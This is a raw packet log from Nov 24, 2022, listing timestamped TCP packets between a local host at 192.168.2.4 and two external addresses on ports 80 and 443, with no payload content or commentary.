                    Nov 24, 2022 20:13:11.758584976 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.758613110 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758654118 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758671999 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.758697033 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758738995 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758754969 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.758778095 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758819103 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758830070 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.758858919 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758922100 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.758948088 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.758961916 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759005070 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759013891 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759043932 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759084940 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759099960 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759128094 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759167910 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759180069 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759207964 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759248972 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759259939 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759288073 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759327888 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759351969 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759368896 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759409904 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759422064 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759452105 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759490967 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759516001 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759531975 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759577036 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759592056 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759617090 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759658098 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759681940 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.759701967 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759742022 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.759758949 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.802802086 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.802870989 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.802957058 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.850867987 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:11.897341967 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:11.944587946 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041260004 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041328907 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041372061 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041414022 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041414022 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041457891 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041471004 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041501045 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041543961 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041554928 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041584969 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041625977 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041635036 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041667938 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041711092 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041718006 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041764975 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041805983 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041811943 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041850090 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041892052 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041899920 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.041932106 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041973114 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.041987896 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042018890 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042058945 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042067051 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042105913 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042146921 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042165041 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042188883 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042229891 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042243004 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042269945 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042310953 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042318106 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042351007 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042392015 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042398930 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042432070 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042473078 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042481899 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042515993 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042556047 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042565107 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042596102 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042639017 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042649984 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042726994 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042768955 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042809963 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042810917 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042851925 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042860985 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.042931080 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.042977095 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043018103 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043018103 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043060064 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043072939 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043100119 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043143034 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043149948 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043185949 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043226004 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043235064 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043266058 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043307066 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043315887 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043346882 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043387890 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043395042 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043427944 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043468952 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043474913 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043510914 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043551922 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043565989 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.043592930 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043633938 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.043642044 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.083750010 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.083811045 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.083831072 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.132056952 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.132447958 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.178977966 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.225538015 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.272685051 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324178934 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324225903 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324259996 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324285984 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324311972 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324340105 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324364901 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324389935 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324388027 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324414968 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324430943 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324440956 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324459076 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324461937 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324481010 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324500084 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324517012 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324539900 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324563980 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324596882 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324620962 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324645042 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324666977 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324668884 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324695110 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324719906 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324732065 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324747086 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324771881 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324798107 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324805975 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324822903 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324829102 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324848890 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324876070 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324879885 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324902058 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324922085 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.324928045 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324954987 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324980021 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.324985027 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325006008 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325027943 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325031042 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325056076 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325077057 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325081110 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325108051 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325133085 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325138092 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325159073 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325184107 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325186014 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325210094 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325231075 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325236082 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325263023 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325282097 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325288057 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325314999 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325335979 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325340033 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325366974 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325383902 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325392008 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325417995 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325434923 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325443983 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325469017 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325493097 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325511932 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325536966 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325539112 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.325571060 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.325612068 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.364645958 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.364717007 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.364797115 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.412852049 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.459650040 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.459760904 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.553510904 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.600925922 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607033014 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607098103 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607141018 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607173920 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607182980 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607223034 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607254028 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607264042 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607305050 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607336044 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607346058 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607386112 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607404947 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607426882 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607469082 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607506990 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607508898 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607549906 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607572079 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607593060 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607633114 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607652903 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607673883 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607713938 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607736111 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607754946 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607798100 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607816935 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607839108 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607878923 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607901096 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.607919931 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607960939 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.607984066 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608002901 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608042955 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608063936 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608083963 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608124018 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608145952 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608165979 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608205080 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608228922 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608246088 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608288050 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608314037 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608326912 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608352900 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608367920 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608392954 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608408928 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608434916 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608449936 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608474970 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608491898 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608515024 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:12.608531952 CET8049701123.253.32.170192.168.2.4
                    Nov 24, 2022 20:13:12.608551979 CET4970180192.168.2.4123.253.32.170
                    Nov 24, 2022 20:13:26.508387089 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.508403063 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.508502007 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.508577108 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.508593082 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.508734941 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.508809090 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.508829117 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.508964062 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509036064 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.509054899 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509130955 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509200096 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.509216070 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509298086 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509363890 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.509378910 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509510040 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509581089 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.509598017 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509727955 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509799957 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.509819984 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.509934902 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.510077000 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.510107040 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.510193110 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.510324955 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.510345936 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.547781944 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.547971964 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.548022032 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.550704002 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.550848961 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.550884962 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.550936937 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.550970078 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.550985098 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.551021099 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551043034 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.551059961 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551117897 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.551201105 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551287889 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.551305056 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551374912 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551460981 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.551477909 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551542997 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551615000 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.551630974 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551719904 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551789045 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.551805019 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.551898956 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552014112 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.552030087 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552067995 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552141905 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.552158117 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552361965 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552453995 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.552469969 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552557945 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552649975 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.552665949 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552727938 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552809954 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.552824974 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552891970 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.552980900 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.552998066 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553056955 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553129911 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.553145885 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553222895 CET443497155.135.247.111192.168.2.4
                    Nov 24, 2022 20:13:26.553303957 CET49715443192.168.2.45.135.247.111
                    Nov 24, 2022 20:13:26.553319931 CET443497155.135.247.111192.168.2.4
